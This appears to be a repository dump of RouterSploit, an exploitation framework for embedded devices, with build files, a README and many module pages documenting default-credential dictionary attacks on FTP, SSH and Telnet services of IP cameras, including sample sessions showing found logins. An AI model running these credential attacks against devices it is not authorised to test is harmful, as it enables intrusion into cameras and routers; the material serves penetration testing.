# PyBuilder
target/
# VS Code
.vscode
# virtualenv
venv/
# macOS
.DS_Store
.DS_Store?
# vim
*.swp
*.swo
# Pipenv files
Pipfile
Pipfile.lock
================================================
FILE: .travis/install.sh
================================================
#!/bin/bash
set -e
set -x
if [[ "$(uname -s)" == 'Darwin' ]]; then
sw_vers
git clone --depth 1 https://github.com/yyuu/pyenv.git ~/.pyenv
PYENV_ROOT="$HOME/.pyenv"
PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init -)"
pyenv install $PYTHON_VERSION
pyenv global $PYTHON_VERSION
pyenv rehash
pip install --user virtualenv
python -m virtualenv ~/.venv
source ~/.venv/bin/activate
fi
python -m pip install --upgrade pip
python -m pip install -r requirements-dev.txt
================================================
FILE: .travis/run.sh
================================================
#!/bin/bash
set -e
set -x
if [[ "$(uname -s)" == "Darwin" ]]; then
PYENV_ROOT="$HOME/.pyenv"
PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init -)"
source ~/.venv/bin/activate
fi
make lint tests
================================================
FILE: .travis.yml
================================================
language: python
matrix:
include:
- os: linux
python: 3.6
- os: osx
language: generic
env: PYTHON_VERSION=3.6.1
install:
- "./.travis/install.sh"
script:
- "./.travis/run.sh"
================================================
FILE: CONTRIBUTING.md
================================================
# Contribution Guidelines
There are many ways to contribute to RouterSploit project, and the routersploit team is grateful for all contributions. This overview summarizes the most important steps to get you started as a contributor.
* Report bugs to the routersploit issue tracker.
* Make suggestions for changes, updates, or new features to the routersploit issue tracker.
* Contribute bug fixes, example code, documentation, or tutorials to routersploit.
* Contribute new features to routersploit.
## Bug reports
When submitting bug reports, please consider providing the following information:
* Reproduction steps: step by step description to reproduce the problem.
* Expected: Describe the behavior you expect.
* Actual: Describe the behavior you see.
## Testing
It is hard to test modules in all possible scenarios. If you would like to help:
1. Check what device you have - identify vendor and version.
2. Check if routersploit contains exploits for the device you posses.
3. If exploit does not work but it should, check "show info" for more information. References should provide you with links to proof of concept exploits.
Example:
```
References:
- https://www.exploit-db.com/exploits/24975/
```
4. Try to use proof of concept exploit and check if it works properly. If it does, feel free to create new issue bug with explanation that the routersploit's module does not work properly.
## Development
* [Creating exploit module](https://github.com/reverse-shell/routersploit/wiki/Creating-Exploit)
* [Creating creds module](https://github.com/reverse-shell/routersploit/wiki/Creating-Creds)
* [Creating scanner module](https://github.com/reverse-shell/routersploit/wiki/Creating-Scanner)
================================================
FILE: Dockerfile
================================================
FROM python:3.9-bookworm
WORKDIR /routersploit
RUN useradd rts -U -m && \
chown -R rts:rts /routersploit
USER rts
COPY requirements.txt .
RUN pip install --user --no-cache-dir -r requirements.txt
COPY routersploit routersploit
COPY rsf.py rsf.py
# Not actually needed since present in docker-compose already
CMD ["python", "rsf.py"]
================================================
FILE: LICENSE
================================================
Copyright 2018, The RouterSploit Framework (RSF) by Threat9
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of RouterSploit Framework nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above licensing was taken from the BSD licensing and is applied to RouterSploit Framework as well.
Note that the RouterSploit Framework is provided as is, and is a royalty free open-source application.
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit.
================================================
FILE: MANIFEST.in
================================================
recursive-include routersploit/resources/ssh_keys *.json *.key
recursive-include routersploit/resources/vendors *.dat
recursive-include routersploit/resources/wordlists *.txt
================================================
FILE: Makefile
================================================
.PHONY: build run test lint lint-modules clean prune help
DIRECTORY=.
EXCLUDED=.git,rsf.py
RSF_IMAGE=routersploit
FLAKE8_IGNORED_RULES=E501,F405,F403,W504
build:
docker build -t $(RSF_IMAGE) .
run:
docker run -it --rm $(RSF_IMAGE)
lint:
python3 -m flake8 --exclude=$(EXCLUDED) --ignore=$(FLAKE8_IGNORED_RULES) $(DIRECTORY)
tests: clean
python3 -m pytest -n16 tests/core/ tests/test_exploit_scenarios.py tests/test_module_info.py
python3 -m pytest -n16 tests/exploits/ tests/creds/ tests/encoders/ tests/generic/ tests/payloads/
clean:
find . -name '*.pyc' -delete
find . -name '*.pyo' -delete
find . -name '*~' -delete
prune:
docker images -q -f dangling=true | xargs docker rmi
docker ps -q -f status=exited | xargs docker rm
help:
@echo " run"
@echo " Run Routersploit in docker container"
@echo " lint"
@echo " Check style with flake8."
@echo " test"
@echo " Run test suite"
@echo " clean"
@echo " Remove python artifacts."
@echo " prune"
@echo " Remove dangling docker images and exited containers."
================================================
FILE: README.md
================================================
# RouterSploit - Exploitation Framework for Embedded Devices
[](http://www.python.org/download/)
[](https://travis-ci.org/threat9/routersploit)
# Community
Join community on [Embedded Exploitation Discord](https://discord.gg/UCXARN2vBx).
# Description
The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
[](https://asciinema.org/a/180370)
It consists of various modules that aid penetration testing operations:
* exploits - modules that take advantage of identified vulnerabilities
* creds - modules designed to test credentials against network services
* scanners - modules that check if a target is vulnerable to any exploit
* payloads - modules that are responsible for generating payloads for various architectures and injection points
* generic - modules that perform generic attacks
# Installation
## Requirements
Required:
* requests
* paramiko
* pysnmp
* pycrypto
Optional:
* bluepy - Bluetooth low energy
## Installation on Kali Linux
```
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
```
Bluetooth Low Energy support:
```
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
## Installation on Ubuntu 20.04
```
sudo apt-get install git python3-pip
git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
```
Bluetooth Low Energy support:
```
sudo apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
## Installation on Ubuntu 18.04 & 17.10
```
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
```
Bluetooth Low Energy support:
```
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
## Installation on OSX
```
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
```
## Running on Docker
```
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker compose up --build -d
docker attach routersploit
```
### To run again without rebuild
```
docker start routersploit
docker attach routersploit
```
# Update
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
```
cd routersploit
git pull
```
# Build your own
To our surprise, people started to fork
[routersploit](https://github.com/threat9/routersploit) not because they were
interested in the security of embedded devices but simply because they want to
leverage our interactive shell logic and build their tools using similar
concept. All these years they must have said: _"There must be a better way!"_
and they were completely right, the better way is called
[_Riposte_](https://github.com/fwkz/riposte).
[_Riposte_](https://github.com/fwkz/riposte) allows you to easily wrap your
application inside a tailored interactive shell. Common chores regarding
building REPLs was factored out and being taken care of so you can
focus on specific domain logic of your application.
# License
The RouterSploit Framework is under a BSD license.
Please see [LICENSE](LICENSE) for more details.
# Acknowledgments
* [riposte](https://github.com/fwkz/riposte)
================================================
FILE: docker-compose.yaml
================================================
services:
routersploit:
build:
context: .
dockerfile: Dockerfile
container_name: routersploit
environment:
- PYTHONUNBUFFERED=1
stdin_open: true
tty: true
command: ["python","rsf.py"]
================================================
FILE: docs/modules/creds/cameras/acti/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Acti Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/ftp_default_creds
rsf (Acti Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/acti/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Acti Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/ssh_default_creds
rsf (Acti Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/acti/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Acti Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/telnet_default_creds
rsf (Acti Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/american_dynamics/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/ftp_default_creds
rsf (American Dynamics Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/american_dynamics/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/ssh_default_creds
rsf (American Dynamics Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/american_dynamics/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/telnet_default_creds
rsf (American Dynamics Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/arecont/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Arecont Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/arecont/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/arecont/ftp_default_creds
rsf (Arecont Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Arecont Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/arecont/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Arecont Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/arecont/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/arecont/ssh_default_creds
rsf (Arecont Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Arecont Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/arecont/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Arecont Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/arecont/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/arecont/telnet_default_creds
rsf (Arecont Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Arecont Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/avigilon/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Avigilon Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avigilon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avigilon/ftp_default_creds
rsf (Avigilon Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avigilon Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/avigilon/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Avigilon Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avigilon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avigilon/ssh_default_creds
rsf (Avigilon Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avigilon Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/avigilon/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Avigilon Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avigilon/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avigilon/telnet_default_creds
rsf (Avigilon Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avigilon Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/avtech/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Avtech Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avtech/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avtech/ftp_default_creds
rsf (Avtech Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avtech Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/avtech/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Avtech Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avtech/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avtech/ssh_default_creds
rsf (Avtech Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avtech Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/avtech/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Avtech Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/avtech/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/avtech/telnet_default_creds
rsf (Avtech Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Avtech Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/axis/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Axis Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/axis/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/axis/ftp_default_creds
rsf (Axis Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Axis Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/axis/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Axis Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/axis/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/axis/ssh_default_creds
rsf (Axis Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Axis Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/axis/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Axis Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/axis/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/axis/telnet_default_creds
rsf (Axis Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Axis Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/basler/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Basler Camera FTP service.
If valid credentials are found, they are displayed to the user.
